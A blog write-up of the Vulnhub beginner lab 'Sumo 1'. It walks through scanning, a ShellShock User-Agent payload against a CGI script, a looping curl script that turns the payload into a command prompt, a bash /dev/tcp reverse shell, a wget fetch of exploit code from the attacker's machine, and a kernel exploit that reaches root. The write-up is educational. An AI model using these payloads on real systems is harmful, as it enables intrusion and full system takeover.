<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="author" content="xanhacks ">
<meta name="description" content="Today I&amp;rsquo;m going to present you my writeup for Sumo 1. It&amp;rsquo;s a linux machine with a beginner level difficulty. You can find the link to download it here.
Let&amp;rsquo;s go! So we start with a netdiscover to find the victim&amp;rsquo;s IP address.
We continue with an nmap scan to discover which services/ports are active on the machine.
$ nmap -A -T4 192.168.43.11  There is only port 22 with OpenSSH 5." />
<meta name="keywords" content="infosec, cybersecurity, writeups, opensource, foss, privacy, vulnhub, writeup, pentest, beginner" />
<meta name="robots" content="noodp" />
<meta name="theme-color" content="" />
<link rel="canonical" href="/posts/vulnhub-sumo1/" />


    <title>
        
            Vulnhub: Sumo1 :: xanhacks  — infosec, IT, privacy, open source &amp; more
        
    </title>



<link href="https://cdnjs.cloudflare.com/ajax/libs/flag-icon-css/3.2.1/css/flag-icon.min.css" rel="stylesheet"
    type="text/css">



<link rel="stylesheet" href="/main.23f4703a6cb96b2a677214723ea7a996db83ee0177e559dda84f1167ffb9c3d3.css">






<meta itemprop="name" content="Vulnhub: Sumo1">
<meta itemprop="description" content="Today I&rsquo;m going to present you my writeup for Sumo 1. It&rsquo;s a linux machine with a beginner level difficulty. You can find the link to download it here.
Let&rsquo;s go! So we start with a netdiscover to find the victim&rsquo;s IP address.
We continue with an nmap scan to discover which services/ports are active on the machine.
$ nmap -A -T4 192.168.43.11  There is only port 22 with OpenSSH 5.">
<meta itemprop="datePublished" content="2020-06-12T10:59:41&#43;02:00" />
<meta itemprop="dateModified" content="2020-06-12T10:59:41&#43;02:00" />
<meta itemprop="wordCount" content="564">
<meta itemprop="image" content=""/>



<meta itemprop="keywords" content="vulnhub,writeup,pentest,beginner," />
<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content=""/>

<meta name="twitter:title" content="Vulnhub: Sumo1"/>
<meta name="twitter:description" content="Today I&rsquo;m going to present you my writeup for Sumo 1. It&rsquo;s a linux machine with a beginner level difficulty. You can find the link to download it here.
Let&rsquo;s go! So we start with a netdiscover to find the victim&rsquo;s IP address.
We continue with an nmap scan to discover which services/ports are active on the machine.
$ nmap -A -T4 192.168.43.11  There is only port 22 with OpenSSH 5."/>







    <meta property="article:published_time" content="2020-06-12 10:59:41 &#43;0200 CEST" />








    </head>

    <body class="dark-theme">
        <div class="container">
            <header class="header">
    <span class="header__inner">
        <a href="/" style="text-decoration: none;">
    <div class="logo">
        
            <span class="logo__mark">></span>
            <span class="logo__text">xanhacks</span>
            <span class="logo__cursor" style=
                  "
                   background-color:#30B000;
                   ">
            </span>
        
    </div>
</a>


        <span class="header__right">
            
                <nav class="menu">
    <ul class="menu__inner"><li><a href="/about">About</a></li><li><a href="/posts">Posts</a></li>
    </ul>
</nav>

                <span class="menu-trigger">
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                        <path d="M0 0h24v24H0z" fill="none"/>
                        <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"/>
                    </svg>
                </span>
            

            <span class="theme-toggle unselectable"><svg class="theme-toggler" width="24" height="24" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
  <path d="M22 41C32.4934 41 41 32.4934 41 22C41 11.5066 32.4934 3 22
  3C11.5066 3 3 11.5066 3 22C3 32.4934 11.5066 41 22 41ZM7 22C7
  13.7157 13.7157 7 22 7V37C13.7157 37 7 30.2843 7 22Z"/>
</svg>
</span>
        </span>
    </span>
</header>


            <div class="content">
                
    <main class="post">

        <div class="post-info">
            <p><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-clock"><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>3 minutes

            

            </p>
        </div>

        <article>
            <h1 class="post-title">
                <a href="/posts/vulnhub-sumo1/">Vulnhub: Sumo1</a>
            </h1>

            

            <div class="post-content">
                <p>Today I&rsquo;m going to present you my writeup for Sumo 1. It&rsquo;s a linux machine with a beginner level difficulty. You can find the link to download it <a href="https://www.vulnhub.com/entry/sumo-1,480/">here</a>.</p>
<p>Let&rsquo;s go! So we start with a <strong>netdiscover</strong> to find the victim&rsquo;s IP address.</p>

    <img src="../../posts-img/vulnhub-sumo1/netdiscover.png"  alt="Netdisover"  class="left"  style="border-radius: 2px; margin: 20px;"  />


<p>We continue with an nmap scan to discover which services/ports are active on the machine.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">$ nmap -A -T4 192.168.43.11
</code></pre></div>
    <img src="../../posts-img/vulnhub-sumo1/nmap.png"  alt="Nmap scan"  class="left"  style="border-radius: 2px; margin: 20px;"  />


<p>There is only port 22 with OpenSSH 5.9p1 and port 80 with Apache 2.2.22 open. The versions are not very up to date. 😀 We can also see that the machine seems to be on Ubuntu.</p>
<p>So, I decide to look at the web server first. And here&rsquo;s the first page :</p>

    <img src="../../posts-img/vulnhub-sumo1/index.html.png"  alt="Index page"  class="left"  style="border-radius: 2px; margin: 20px;"  />


<p>There is only one static index.html page which is not very interesting. So I run a vulnerability scan with nikto and a scan of the site tree with gobuster.</p>
<p>The scan of the tree structure of the site does not show anything interesting but nikto shows us a possible entry point. 😃</p>

    <img src="../../posts-img/vulnhub-sumo1/nikto.png"  alt="Nikto scan"  class="left"  style="border-radius: 2px; margin: 20px;"  />


<p>We come across a vulnerability widely known as &ldquo;ShellShock&rdquo;.</p>
<p>Let&rsquo;s check if this vulnerability is exploitable.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">$ curl -H <span style="color:#e6db74">&#34;User-Agent: () { :; }; echo; /bin/bash -c &#39;id&#39;&#34;</span> http://192.168.43.111/cgi-bin/test.sh
uid<span style="color:#f92672">=</span>33<span style="color:#f92672">(</span>www-data<span style="color:#f92672">)</span> gid<span style="color:#f92672">=</span>33<span style="color:#f92672">(</span>www-data<span style="color:#f92672">)</span> groups<span style="color:#f92672">=</span>33<span style="color:#f92672">(</span>www-data<span style="color:#f92672">)</span>
</code></pre></div><p>And yes! We&rsquo;ve got a RCE. Here&rsquo;s a little summary of what just happened.</p>
<p>The User-Agent variable is stored by the web server in a variable to better understand the client&rsquo;s browser. The web server uses bash tools that will use and interpret this variable because it starts with <strong>() { :; };</strong>.</p>
<p>You can learn more about ShellShock here:</p>
<ul>
<li><a href="https://blog.cloudflare.com/inside-shellshock/">https://blog.cloudflare.com/inside-shellshock/</a></li>
<li><a href="https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29">https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29</a></li>
<li><a href="https://github.com/opsxcq/exploit-CVE-2014-6271">https://github.com/opsxcq/exploit-CVE-2014-6271</a></li>
</ul>
<p>So I immediately created a shell script to save time.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#75715e">#!/bin/bash
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">while</span> true
<span style="color:#66d9ef">do</span>
	read -p <span style="color:#e6db74">&#34;&gt; &#34;</span> COMMAND
	curl -H <span style="color:#e6db74">&#34;User-Agent: () { :; }; echo; /bin/bash -c &#39;</span>$COMMAND<span style="color:#e6db74">&#39;&#34;</span> http://192.168.43.111/cgi-bin/test.sh
<span style="color:#66d9ef">done</span>
</code></pre></div><p>Let&rsquo;s start internal reconnaissance.</p>

    <img src="../../posts-img/vulnhub-sumo1/recon.png"  alt="Internal reconnaissance"  class="left"  style="border-radius: 2px; margin: 20px;"  />


<p>So we&rsquo;re the <strong>www-data</strong> user (what a surprise! 😆) and there&rsquo;s another user under the name <strong>sumo</strong> who doesn&rsquo;t look very interesting at first glance.</p>
<p>To elevate our privileges we will use a kernel exploit.</p>
<pre><code>&gt; uname -a
Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
&gt; lsb_release -a
Distributor ID:	Ubuntu
Description:	Ubuntu 12.04 LTS
Release:	12.04
Codename:	precise
</code></pre><p>After a quick search with <strong>searchsploit</strong> we come across the following exploit: <a href="https://www.exploit-db.com/exploits/33589">Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - &lsquo;perf_swevent_init&rsquo; Local Privilege Escalation (3)</a></p>
<p>Before launching it, I decide to use a reverse shell in bash for more comfort.</p>
<pre><code>&gt; bash -i &gt;&amp; /dev/tcp/192.168.43.75/1337 0&gt;&amp;1

-- NEW TAB --
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [192.168.43.75] from (UNKNOWN) [192.168.43.111] 38388
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$
</code></pre><p>So I use the python HTTP server to be able to download the exploit source code on the victim machine.</p>
<pre><code>www-data@ubuntu:/tmp$ wget 192.168.43.75:8000/33589.c -O exploit.c
...
www-data@ubuntu:/tmp$ gcc exploit.c -O2
gcc exploit.c -O2
gcc: error trying to exec 'cc1': execvp: No such file or directory
</code></pre>
    <img src="../../gif/sad.gif"  alt="GIF Sad"  class="left"  style="border-radius: 2px; margin: 20px; max-height: 300px;"  />


<p>Unfortunately, the exploit does not want to be compiled. 😭 We can remedy this problem by modifying the PATH variable.</p>
<pre><code>www-data@ubuntu:/tmp$ PATH=/usr/bin:$PATH       
PATH=/usr/bin:$PATH
www-data@ubuntu:/tmp$ export PATH
export PATH
www-data@ubuntu:/tmp$ gcc exploit.c -O2
gcc exploit.c -O2
www-data@ubuntu:/tmp$ ls
ls
a.out
exploit.c
</code></pre><p>The exploit is well compiled, let&rsquo;s go!</p>
<pre><code>www-data@ubuntu:/tmp$ ./a.out 0
./a.out 0
stdin: is not a tty
id
uid=0(root) gid=0(root) groups=0(root)    &lt;-- root :)
ls /root
root.txt
cat /root/root.txt
{Sum0-SunCSR-2020_r001}
</code></pre>
    <img src="../../gif/oura.gif"  alt="GIF Victory"  class="left"  style="border-radius: 2px; margin: 20px; max-height: 300px;"  />


<p>There you go, I hope this writeup gets you more !</p>

            </div>
        </article>

        <hr />

        <div class="post-info">
                <p>
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-tag meta-icon"><path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7" y2="7"></line></svg><span class="tag"><a href="tags/vulnhub">vulnhub</a></span><span class="tag"><a href="tags/writeup">writeup</a></span><span class="tag"><a href="tags/pentest">pentest</a></span><span class="tag"><a href="tags/beginner">beginner</a></span>
                </p>

            <p><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-file-text"><path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline><line x1="16" y1="13" x2="8" y2="13"></line><line x1="16" y1="17" x2="8" y2="17"></line><polyline points="10 9 9 9 8 9"></polyline></svg>564 Words</p>

            <p><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-calendar"><rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line></svg>2020-06-12 10:59 &#43;0200</p>
        </div>

        
    </main>

            </div>

            
                <footer class="footer">
    <div class="footer__inner">
        <div class="footer__content">
            <span>&copy; 2020</span>
            
                <span><a href="">xanhacks</a></span>
            
            
            <span> <a href="posts/index.xml" target="_blank" title="rss"><svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 20 20" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-rss"><path d="M4 11a9 9 0 0 1 9 9"></path><path d="M4 4a16 16 0 0 1 16 16"></path><circle cx="5" cy="19" r="1"></circle></svg></a></span>
        </div>
    </div>
    <div class="footer__inner">
        <div class="footer__content">
            <span><small>Powered by <a href="http://gohugo.io">Hugo</a></small></span>
            <span><small>Theme by <a href="https://github.com/rhazdon">Djordje Atlialp</a></small></span>
        </div>
    </div>
</footer>

            
        </div>

        




<script type="text/javascript" src="/bundle.min.dc716e9092c9820b77f96da294d0120aeeb189b5bcea9752309ebea27fd53bbe6b13cffb2aca8ecf32525647ceb7001f76091de4199ac5a3caa432c070247f5b.js" integrity="sha512-3HFukJLJggt3&#43;W2ilNASCu6xibW86pdSMJ6&#43;on/VO75rE8/7KsqOzzJSVkfOtwAfdgkd5BmaxaPKpDLAcCR/Ww=="></script>



    </body>
</html>
